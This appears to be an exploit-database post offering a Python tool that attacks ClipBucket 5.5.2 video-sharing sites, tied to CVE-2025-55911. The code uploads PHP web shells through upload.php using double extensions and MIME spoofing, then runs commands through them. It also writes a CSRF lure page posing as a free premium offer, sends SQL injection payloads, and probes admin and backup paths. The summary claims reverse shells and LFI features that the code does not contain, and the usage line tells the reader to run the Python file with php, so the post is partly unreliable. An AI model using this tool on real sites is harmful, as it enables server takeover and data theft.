============================================================================================================================================= | # Title : ClipBucket 5.5.2 Build 90 Practical Exploitation Tool | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://github.com/MacWarrior/clipbucket-v5/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/211129/ & CVE-2025-55911 [+] Summary : An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation.Key Capabilities 1. Advanced RCE (Remote Code Execution) Multiple PHP shell payloads (c99, WSO-style, reverse shell) Bypass techniques: Double extensions, null byte injection, MIME type spoofing Smart detection: Automatic shell validation and access level assessment Post-exploitation: Auto-commands for system enumeration 2. File Upload Exploitation 6 different payload types with various obfuscation methods Multiple upload endpoints: Standard, AJAX, action-based Response analysis: Smart parsing of upload responses to locate shells Success verification: Automated shell testing with command execution 3. SQL Injection Attacks Comprehensive testing: Union-based, Error-based, Time-based, Blind SQLi Data extraction: Automatic database/table/column enumeration Detailed reporting: Complete payload analysis and exploitation examples Multi-endpoint testing: Tests multiple potential injection points 4. Additional Attack Vectors LFI (Local File Inclusion): /etc/passwd, config files, PHP filter wrappers Directory brute-forcing: 20-thread concurrent scanning for hidden paths CSRF exploitation: Attack vector identification and PoC generation Admin panel discovery: Common ClipBucket admin paths [+] Usage : * : Save this file as: exploit.php Run: php exploit.php [+] POC : #!/usr/bin/env python3 """ ClipBucket Practical Exploitation Tool """ import requests import json import time import random import os import sys import re import urllib3 from urllib.parse import urlparse # تعطيل تحذيرات SSL urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class ClipBucketExploiter: def __init__(self, target_url): self.target = target_url.rstrip('/') self.session = requests.Session() self.session.verify = False self.session.timeout = 10 # إعداد headers self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.9', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest' }) self.vulnerabilities = [] self.shell_urls = [] def print_status(self, message, status="info"): """طباعة رسالة باللون المناسب""" colors = { "info": "\033[96m", # أزرق سماوي "success": "\033[92m", # أخضر "warning": "\033[93m", # أصفر "error": "\033[91m", # أحمر "critical": "\033[95m" # بنفسجي } color = colors.get(status, "\033[97m") print(f"{color}[{status.upper()}] {message}\033[0m") def check_clipbucket(self): """التحقق مما إذا كان الموقع يستخدم ClipBucket""" self.print_status("Checking if website uses ClipBucket...", "info") try: # فحص الصفحة الرئيسية resp = self.session.get(self.target) # علامات ClipBucket indicators = [ 'clipbucket', 'CB', 'upload.php', 'video_upload', 'action=upload', 'file_uploader', 'video-upload', 'videobb', 'my_videos', 'video_manager' ] found = [] for indicator in indicators: if indicator.lower() in resp.text.lower(): found.append(indicator) if found: self.print_status(f"ClipBucket indicators found: {', '.join(found[:3])}", "success") # فحص upload.php مباشرة upload_test = f"{self.target}/upload.php" try: upload_resp = self.session.get(upload_test, timeout=5) if upload_resp.status_code == 200: self.print_status("upload.php is accessible!", "success") return True else: self.print_status(f"upload.php returned status: {upload_resp.status_code}", "warning") except: self.print_status("upload.php is not accessible", "warning") return True else: self.print_status("No clear ClipBucket indicators found", "warning") return False except Exception as e: self.print_status(f"Connection error: {str(e)}", "error") return False def test_upload_endpoint(self): """اختبار نقطة رفع الملفات""" self.print_status("Testing upload.php endpoint...", "info") upload_url = f"{self.target}/upload.php" # اختبار HEAD أولاً try: head_resp = self.session.head(upload_url, timeout=5) self.print_status(f"HEAD request: Status {head_resp.status_code}", "info") except: pass # اختبار GET try: get_resp = self.session.get(upload_url, timeout=5) self.print_status(f"GET request: Status {get_resp.status_code}, Size: {len(get_resp.text)} chars", "info") # البحث عن علامات نموذج الرفع if 'upload' in get_resp.text.lower() or 'file' in get_resp.text.lower(): self.print_status("Upload form detected", "success") return True else: self.print_status("No upload form detected in response", "warning") return False except Exception as e: self.print_status(f"Error testing upload endpoint: {str(e)}", "error") return False def exploit_file_upload(self): """استغلال ثغرة رفع الملفات""" self.print_status("Attempting file upload exploitation...", "info") # بايلودات مختلفة payloads = [ { 'filename': 'test.php', 'content': b'', 'mime': 'application/x-php' }, { 'filename': 'shell.php.gif', 'content': b'GIF89a', 'mime': 'image/gif' }, { 'filename': 'exploit.mp4.php', 'content': b'\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom', 'mime': 'video/mp4' } ] for payload in payloads: self.print_status(f"Trying payload: {payload['filename']}", "info") files = { 'Filedata': (payload['filename'], payload['content'], payload['mime']) } data = { 'title': 'Test Video Upload', 'collection_id': '1' } try: response = self.session.post(f"{self.target}/upload.php", files=files, data=data, timeout=15) self.print_status(f"Response status: {response.status_code}", "info") self.print_status(f"Response preview: {response.text[:200]}", "info") # تحليل الرد if response.status_code == 200: # البحث عن إشارات النجاح success_keywords = ['success', 'file_name', 'uploaded', 'complete', 'yes'] for keyword in success_keywords: if keyword in response.text.lower(): self.print_status(f"Upload successful! Keyword '{keyword}' found", "success") # محاولة استخراج اسم الملف filename = self.extract_filename(response.text) if filename: shell_url = f"{self.target}/temp/{filename}" self.shell_urls.append(shell_url) self.print_status(f"Potential shell: {shell_url}", "critical") # اختبار الشل self.test_shell_access(shell_url, payload['filename']) return True # تحليل JSON try: json_data = json.loads(response.text) if 'file_name' in json_data: filename = json_data['file_name'] shell_url = f"{self.target}/temp/{filename}" self.shell_urls.append(shell_url) self.print_status(f"JSON response - Shell: {shell_url}", "critical") return True except: pass except Exception as e: self.print_status(f"Upload error: {str(e)}", "error") return False def extract_filename(self, response_text): """استخراج اسم الملف من الرد""" patterns = [ r'"file_name"\s*:\s*"([^"]+)"', r"'file_name'\s*:\s*'([^']+)'", r'file_name["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)', r'filename["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)' ] for pattern in patterns: matches = re.findall(pattern, response_text) if matches: filename = matches[0] # إضافة امتداد إذا لم يكن موجوداً if '.' not in filename: filename += '.mp4' return filename return None def test_shell_access(self, shell_url, original_filename): """اختبار الوصول إلى الشل""" self.print_status(f"Testing shell access: {shell_url}", "info") # بناء على نوع الملف if '.php' in original_filename.lower(): # اختبار PHP shell test_url = f"{shell_url}?cmd=echo+CLIPBUCKET_TEST" try: response = self.session.get(test_url, timeout=10) if 'CLIPBUCKET_TEST' in response.text: self.print_status("PHP shell is ACTIVE!", "success") # جلب معلومات النظام info_url = f"{shell_url}?cmd=whoami && pwd" info_response = self.session.get(info_url, timeout=10) self.print_status(f"System info: {info_response.text[:100]}", "success") # حفظ رابط الشل with open('shells_found.txt', 'a') as f: f.write(f"{shell_url}\n") f.write(f"Test command: {shell_url}?cmd=whoami\n") f.write(f"Response: {info_response.text[:200]}\n\n") return True except: pass # محاولة الوصول المباشر try: direct_response = self.session.get(shell_url, timeout=10) if direct_response.status_code == 200: self.print_status(f"File is accessible (status: {direct_response.status_code})", "success") return True except: pass self.print_status("Shell access test failed", "warning") return False def exploit_csrf(self): """استغلال ثغرة CSRF""" self.print_status("Testing for CSRF vulnerability...", "info") test_data = { 'updateVideo': '1', 'videoid': '99999', # ID عالي لتجنب التأثير على فيديوهات حقيقية 'title': 'CSRF Security Test', 'desc': 'This is a security test for CSRF vulnerability', 'tags': 'test,security,csrf' } try: response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10) self.print_status(f"CSRF test response status: {response.status_code}", "info") self.print_status(f"Response preview: {response.text[:150]}", "info") if response.status_code == 200: if 'valid' in response.text.lower() or 'success' in response.text.lower(): self.print_status("CSRF vulnerability CONFIRMED!", "success") self.vulnerabilities.append('CSRF') # إنشاء صفحة استغلال self.create_csrf_exploit_page() return True else: self.print_status("CSRF protection might be enabled", "warning") except Exception as e: self.print_status(f"CSRF test error: {str(e)}", "error") return False def create_csrf_exploit_page(self): """إنشاء صفحة استغلال CSRF""" exploit_html = f''' Free Premium Access

Claim Your Free Premium Account!

Click the button below to activate premium features

''' with open('csrf_attack.html', 'w', encoding='utf-8') as f: f.write(exploit_html) self.print_status("CSRF exploit page created: csrf_attack.html", "success") def test_sqli(self): """اختبار ثغرة SQL Injection""" self.print_status("Testing for SQL Injection...", "info") test_payloads = [ ("1' OR '1'='1", "Basic boolean"), ("1' AND SLEEP(5)--", "Time-based"), ("1' UNION SELECT NULL,version()--", "Union injection") ] for payload, description in test_payloads: self.print_status(f"Testing: {description}", "info") test_data = { 'getForm': '1', 'vid': payload, 'objId': 'test', 'title': 'SQLi Test' } try: if 'SLEEP' in payload: start_time = time.time() response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=15) elapsed = time.time() - start_time if elapsed > 4: self.print_status(f"Time-based SQLi detected! Delay: {elapsed:.2f} seconds", "success") self.vulnerabilities.append('SQL Injection (Time-based)') return True else: response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10) error_indicators = ['sql', 'SQL', 'mysql', 'MySQL', 'syntax error', 'query', 'database'] for indicator in error_indicators: if indicator.lower() in response.text.lower(): self.print_status(f"Error-based SQLi detected: {indicator}", "success") self.vulnerabilities.append('SQL Injection (Error-based)') with open('sqli_evidence.txt', 'w') as f: f.write(f"Payload: {payload}\n") f.write(f"Response:\n{response.text}\n") return True except Exception as e: self.print_status(f"SQLi test error: {str(e)}", "error") self.print_status("No SQL injection vulnerability detected", "warning") return False def find_admin_panel(self): """البحث عن لوحة التحكم""" self.print_status("Searching for admin panel...", "info") common_paths = [ '/admin', '/admin_area', '/administrator', '/admin.php', '/admin/login.php', '/admin/index.php', '/dashboard', '/controlpanel', '/cp', '/admincp', '/cb_admin', '/clipbucket_admin', '/admin_dashboard', '/manage', '/manager' ] found_panels = [] for path in common_paths: url = f"{self.target}{path}" try: # طلب HEAD أولاً (أسرع) head_resp = self.session.head(url, timeout=3, allow_redirects=False) if head_resp.status_code < 400: # طلب GET للتحقق من المحتوى get_resp = self.session.get(url, timeout=5) # تحقق من أن الصفحة تحتوي على علامات لوحة تحكم if any(keyword in get_resp.text.lower() for keyword in ['login', 'admin', 'dashboard', 'control', 'manage', 'panel']): self.print_status(f"Admin panel found: {url}", "success") found_panels.append(url) # حفظ المحتوى للفحص with open('admin_panel_found.txt', 'a') as f: f.write(f"URL: {url}\n") f.write(f"Status: {get_resp.status_code}\n") f.write(f"Size: {len(get_resp.text)} chars\n") f.write("-" * 50 + "\n") except: continue if found_panels: self.print_status(f"Found {len(found_panels)} admin panels", "success") return found_panels else: self.print_status("No admin panels found", "warning") return [] def scan_directories(self): """مسح الدلائل المهمة""" self.print_status("Scanning for important directories...", "info") directories = [ '/uploads', '/upload', '/files', '/temp', '/tmp', '/logs', '/backup', '/backups', '/data', '/database', '/config', '/includes', '/install', '/upgrade', '/assets', '/images', '/videos', '/media' ] found_dirs = [] for directory in directories: url = f"{self.target}{directory}" try: response = self.session.head(url, timeout=3) if response.status_code < 400: self.print_status(f"Directory found: {url} (Status: {response.status_code})", "success") found_dirs.append(url) except: pass return found_dirs def generate_report(self): """توليد تقرير النتائج""" self.print_status("\n" + "="*60, "info") self.print_status("EXPLOITATION REPORT", "critical") self.print_status("="*60, "info") report = [] report.append(f"Target: {self.target}") report.append(f"Scan Time: {time.strftime('%Y-%m-%d %H:%M:%S')}") report.append("") # الثغرات المكتشفة if self.vulnerabilities or self.shell_urls: report.append("VULNERABILITIES FOUND:") report.append("-" * 40) for vuln in self.vulnerabilities: report.append(f"✓ {vuln}") if self.shell_urls: report.append(f"✓ Remote Code Execution: {len(self.shell_urls)} shells deployed") for i, shell in enumerate(self.shell_urls, 1): report.append(f" Shell {i}: {shell}") report.append("") # التوصيات report.append("RECOMMENDATIONS:") report.append("-" * 40) if 'CSRF' in self.vulnerabilities: report.append("• Implement CSRF tokens on all forms") if 'SQL Injection' in ' '.join(self.vulnerabilities): report.append("• Use prepared statements for database queries") if self.shell_urls: report.append("• Implement strict file upload validation") report.append("• Disable PHP execution in upload directories") else: report.append("No critical vulnerabilities found") report.append("") report.append("FILES GENERATED:") report.append("-" * 40) # عرض الملفات المولدة files_to_check = ['shells_found.txt', 'csrf_attack.html', 'admin_panel_found.txt', 'sqli_evidence.txt'] for file in files_to_check: if os.path.exists(file): report.append(f"• {file}") # كتابة التقرير report_text = "\n".join(report) print("\n" + report_text) with open('exploitation_report.txt', 'w', encoding='utf-8') as f: f.write(report_text) self.print_status("\nReport saved to: exploitation_report.txt", "success") def run_complete_scan(self): """تشغيل مسح شامل""" self.print_status("Starting complete ClipBucket vulnerability scan...", "info") # الخطوة 1: التحقق من ClipBucket if not self.check_clipbucket(): self.print_status("Target doesn't appear to be ClipBucket. Stopping scan.", "error") return # الخطوة 2: اختبار upload.php if not self.test_upload_endpoint(): self.print_status("upload.php not functioning properly", "warning") # الخطوة 3: استغلال رفع الملفات self.exploit_file_upload() # الخطوة 4: اختبار CSRF self.exploit_csrf() # الخطوة 5: اختبار SQL Injection self.test_sqli() # الخطوة 6: البحث عن لوحة التحكم self.find_admin_panel() # الخطوة 7: مسح الدلائل self.scan_directories() # الخطوة 8: التقرير النهائي self.generate_report() def main(): """الدالة الرئيسية""" print("\033[95m" + """ ╔══════════════════════════════════════════════════════╗ ║ ClipBucket Exploitation Scanner ║ ║ By indoushka ║ ╚══════════════════════════════════════════════════════╝ """ + "\033[0m") if len(sys.argv) < 2: print("Usage:") print(f" python {sys.argv[0]} ") print("\nExamples:") print(f" python {sys.argv[0]} https://example.com") print(f" python {sys.argv[0]} http://192.168.1.100") print(f" python {sys.argv[0]} http://localhost/clipbucket") return target = sys.argv[1] # إضافة http:// إذا لم يكن موجوداً if not target.startswith(('http://', 'https://')): target = 'http://' + target # إنشاء واستخدام الكلاس exploiter = ClipBucketExploiter(target) try: exploiter.run_complete_scan() except KeyboardInterrupt: print("\n\nScan interrupted by user") except Exception as e: print(f"\nError during scan: {str(e)}") if __name__ == "__main__": main() Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================